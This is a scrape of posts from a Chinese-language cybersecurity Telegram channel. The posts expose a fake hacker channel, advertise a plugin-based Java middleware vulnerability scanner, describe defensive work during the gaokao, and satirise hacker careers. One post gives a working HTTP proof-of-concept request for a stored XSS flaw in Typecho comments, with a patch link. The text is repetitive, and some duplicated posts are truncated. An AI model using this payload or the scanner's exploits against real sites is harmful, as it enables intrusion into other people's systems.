Forwarded from GDP_信息安全(纪念版)
我们的女巫大大 被实锤本地环境了 还嘴硬说有很多这样的文章只能不能发出来
https://mp.weixin.qq.com/s/HUJPNexnJ2CvSobcIjI_IA
https://mp.weixin.qq.com/s/HUJPNexnJ2CvSobcIjI_IA
挂人氵
隔壁群看到有人在问,https://news.1rj.ru/str/SQL011 靠谱不靠谱,这么多网站后台的截图还放了团队logo证明并非盗图
然而其实大黑客所谓的“坐拥众多后台”很容易就能实现,打开http://www.cssmoban.com/hot
随便点进一个后台模板,挂你的logo合影,结束,毫无技术含量的骗局😅
而他那频道里的“技术文章”,也是百度一搜发现基本上没改字复制粘贴而来,
所谓引流十五人赠送的笔记来自几年前烂大街的小迪公开课,b站私信那些卖课的营销号就能领取全套
频道简介摘抄表弟@G_biaodi007(不是简介里那个,具体哪个频道忘了好像是已经弃用了的腾蛇的那个老频道)
隔壁群看到有人在问,https://news.1rj.ru/str/SQL011 靠谱不靠谱,这么多网站后台的截图还放了团队logo证明并非盗图
然而其实大黑客所谓的“坐拥众多后台”很容易就能实现,打开http://www.cssmoban.com/hot
随便点进一个后台模板,挂你的logo合影,结束,毫无技术含量的骗局😅
而他那频道里的“技术文章”,也是百度一搜发现基本上没改字复制粘贴而来,
所谓引流十五人赠送的笔记来自几年前烂大街的小迪公开课,b站私信那些卖课的营销号就能领取全套
频道简介摘抄表弟@G_biaodi007(不是简介里那个,具体哪个频道忘了好像是已经弃用了的腾蛇的那个老频道)
❤7👍1
JAVA 插件化漏洞扫描器(Weblogic、Tomcat、Spring...),Gui基于javafx,POC 目前集成 Weblogic(21个),Tomcat(2)、Shiro、Spring等
插件化 批量扫描 支持多个Java中间件
POC插件编写规范
以CVE-2016-0638为例,
需要定义4个变量name、denoscript、code、result,其中result是默认的扫描结果,这些是该POC的基本信息。
需要定义一个空构造函数,不为空也行。
Check函数,扫描时调用的就是该函数,参数为String target http://xxx
返回值为String result,即扫描结果,例如 "存在漏洞"
System.out.print()的输出会被重定向到扫描器下方的输出控制台中,例如POC中 System.out.println("回显:"+res) 就会在输出在扫描器中
最终编译成class或者jar包都可,注意文件命名须与类名相同(如CVE-2016-0638.class),将需要的依赖放到 Plugin/中间件类型/libs(poc的依赖),poc放到 文件路径:Plugin/中间件类型/payloads
网盘链接https://pan.quark.cn/s/d80cb3a3871f
插件化 批量扫描 支持多个Java中间件
POC插件编写规范
以CVE-2016-0638为例,
需要定义4个变量name、denoscript、code、result,其中result是默认的扫描结果,这些是该POC的基本信息。
需要定义一个空构造函数,不为空也行。
Check函数,扫描时调用的就是该函数,参数为String target http://xxx
返回值为String result,即扫描结果,例如 "存在漏洞"
System.out.print()的输出会被重定向到扫描器下方的输出控制台中,例如POC中 System.out.println("回显:"+res) 就会在输出在扫描器中
最终编译成class或者jar包都可,注意文件命名须与类名相同(如CVE-2016-0638.class),将需要的依赖放到 Plugin/中间件类型/libs(poc的依赖),poc放到 文件路径:Plugin/中间件类型/payloads
网盘链接https://pan.quark.cn/s/d80cb3a3871f
pan.quark.cn
夸克网盘分享
夸克网盘是夸克推出的一款云服务产品,功能包括云存储、高清看剧、文件在线解压、PDF一键转换等。通过夸克网盘可随时随地管理和使用照片、文档、手机资料,目前支持Android、iOS、PC、iPad。
👍2
暂时停更一下
前天下午突然被领导突袭一车拉到某不知名宾馆培训(没敢带这个手机,失联几天也不是被抓了)
高考专项护网,内容挺复杂也不许乱说,能透露的主要分为三个阶段,一个是考试期间保证每个考场学校的破逼电脑能正常放听力还有音频文件的加密,摄像头传输到监考中心的稳定性云云,第二个是阅卷期间内网以及最要命的成绩上传全市数据库排名过程,第三个是查分期间的网站稳定(这个倒和我的关系不大,gov的防护我是相信的不太依赖安服,就看上面都服务器抗不抗造了)
总的来说高考期间的网络安全形式很复杂一点不轻松,只是曝光度不高社会关注度也不大,很多东西都智能化了,每个考场都要兼顾(比如听前几年干这事的同事说见识过申必学生为了好玩u盘拷木马把学校一体机远控了,还好及时排查不然可能会引起放听力都时候他把远程学校电脑音量关了的重大事故),出网的东西也一堆这是我没有想到的(当然内网也不绝对安全,做好了改卷的时候哪个神人玩横向移动的准备)
今天培训完晚上放回来拿衣服和生活用品,顺便说一句我还活着没被抓。明天开始正式停更,具体时间未定,第一次参加这种行动还是希望带黑客别有事没事日弄高考玩,这个不比平时上摸鱼,出事了我是真得进局子😨
前天下午突然被领导突袭一车拉到某不知名宾馆培训(没敢带这个手机,失联几天也不是被抓了)
高考专项护网,内容挺复杂也不许乱说,能透露的主要分为三个阶段,一个是考试期间保证每个考场学校的破逼电脑能正常放听力还有音频文件的加密,摄像头传输到监考中心的稳定性云云,第二个是阅卷期间内网以及最要命的成绩上传全市数据库排名过程,第三个是查分期间的网站稳定(这个倒和我的关系不大,gov的防护我是相信的不太依赖安服,就看上面都服务器抗不抗造了)
总的来说高考期间的网络安全形式很复杂一点不轻松,只是曝光度不高社会关注度也不大,很多东西都智能化了,每个考场都要兼顾(比如听前几年干这事的同事说见识过申必学生为了好玩u盘拷木马把学校一体机远控了,还好及时排查不然可能会引起放听力都时候他把远程学校电脑音量关了的重大事故),出网的东西也一堆这是我没有想到的(当然内网也不绝对安全,做好了改卷的时候哪个神人玩横向移动的准备)
今天培训完晚上放回来拿衣服和生活用品,顺便说一句我还活着没被抓。明天开始正式停更,具体时间未定,第一次参加这种行动还是希望带黑客别有事没事日弄高考玩,这个不比平时上摸鱼,出事了我是真得进局子😨
😭16👍6🤓4🥰1
Typecho框架最近出现严重的xss存储型攻击漏洞,可直接getshell
描述
Typecho错误注释具有漏洞的URL,对任何具有xss有效载荷的文章进行评论,在Comments/usr/themes/default/comments.php中,只过滤开头没有任何其他保护,并直接回显到html,再次访问相同站点时可触发xss
poc
POST /index.php/archives/1/comment HTTP/1.1
Host: 127.0.0.1
Content-Length: 143
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin:http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer:http://127.0.0.1/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
author=123&mail=123%40123.com &url= http://xxx.xxx.com/ "></a><noscript>alert("hack")</noscript><a/href="#&text=123&_=9d8302e080b9c139354b528787f1e5e4
补丁地址https://github.com/typecho/typecho/releases/tag/v1.2.1-rc
描述
Typecho错误注释具有漏洞的URL,对任何具有xss有效载荷的文章进行评论,在Comments/usr/themes/default/comments.php中,只过滤开头没有任何其他保护,并直接回显到html,再次访问相同站点时可触发xss
poc
Host:
Content-Length: 143
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
author=123&mail=123%
补丁地址https://github.com/typecho/typecho/releases/tag/v1.2.1-rc
GitHub
Release v1.2.1-rc · typecho/typecho
What's Changed
Fix checkVersion by @sy-records in #1356
修复Sqlite目录带.校验不通过问题 by @maoxian-1 in #1357
Pr/1344 by @joyqi in #1360
Fix pgsql reset id error by @sy-records in #1369
Update admin welc...
Fix checkVersion by @sy-records in #1356
修复Sqlite目录带.校验不通过问题 by @maoxian-1 in #1357
Pr/1344 by @joyqi in #1360
Fix pgsql reset id error by @sy-records in #1369
Update admin welc...
❤3👏2👍1
第一章:沉淀
第二章:青春终于败给了资本,那场高考毁了我的本科梦
第三章:大专也是大学
第四章:专业网安,未来的黑客
第五章:专升本失败,直接就业少走几年弯路
第六章:距某ctfxx天,顶峰相见
第七章:比赛都是套路,专心实战
第八章:两天护网兵,一生国企情
月薪三千五,华亭也是亭
第九章:主管不是人,愤然辞职
第十章:黑客烧烤
第十一章:烧烤店倒闭,黑客维修
第十二章:行业不吃香,黑客代驾
第十三章:吊销驾驶证,碧桂园五星上将
第十四章:教训不只好歹的业主,欺负落单的外卖员,遇到危险全身而退
第十五章:资深java程序员在家待业
第十六章:入职🐎士兵 《暗网黑客渗透》《kali渗透从入门到精通》《红客联盟内训》《一秒获取女神信息,黑客有多可怕》
第十七章:接触Telegram,黑客之神王者归来
第十八章:入侵美韩,横扫台湾,一声令下十万0day归来,北约闻风丧胆,博彩网站后台更不在话下,各种实时数据收钱拿站
第十九章:个户全户三网机主q反微反接码点号轰炸机,最后喜提反诈
大结局:西工大被美国攻击,若有召,战必回!
#黑客# #渗透# #匿名者# #网络安全#
#APT# #Kali# #红客联盟# #北约# #技术纯享# #FBI# #暗网#
原创,转载请标明出处
第二章:青春终于败给了资本,那场高考毁了我的本科梦
第三章:大专也是大学
第四章:专业网安,未来的黑客
第五章:专升本失败,直接就业少走几年弯路
第六章:距某ctfxx天,顶峰相见
第七章:比赛都是套路,专心实战
第八章:两天护网兵,一生国企情
月薪三千五,华亭也是亭
第九章:主管不是人,愤然辞职
第十章:黑客烧烤
第十一章:烧烤店倒闭,黑客维修
第十二章:行业不吃香,黑客代驾
第十三章:吊销驾驶证,碧桂园五星上将
第十四章:教训不只好歹的业主,欺负落单的外卖员,遇到危险全身而退
第十五章:资深java程序员在家待业
第十六章:入职🐎士兵 《暗网黑客渗透》《kali渗透从入门到精通》《红客联盟内训》《一秒获取女神信息,黑客有多可怕》
第十七章:接触Telegram,黑客之神王者归来
第十八章:入侵美韩,横扫台湾,一声令下十万0day归来,北约闻风丧胆,博彩网站后台更不在话下,各种实时数据收钱拿站
第十九章:个户全户三网机主q反微反接码点号轰炸机,最后喜提反诈
大结局:西工大被美国攻击,若有召,战必回!
#黑客# #渗透# #匿名者# #网络安全#
#APT# #Kali# #红客联盟# #北约# #技术纯享# #FBI# #暗网#
👍33😁15💩5🤣5🤬2
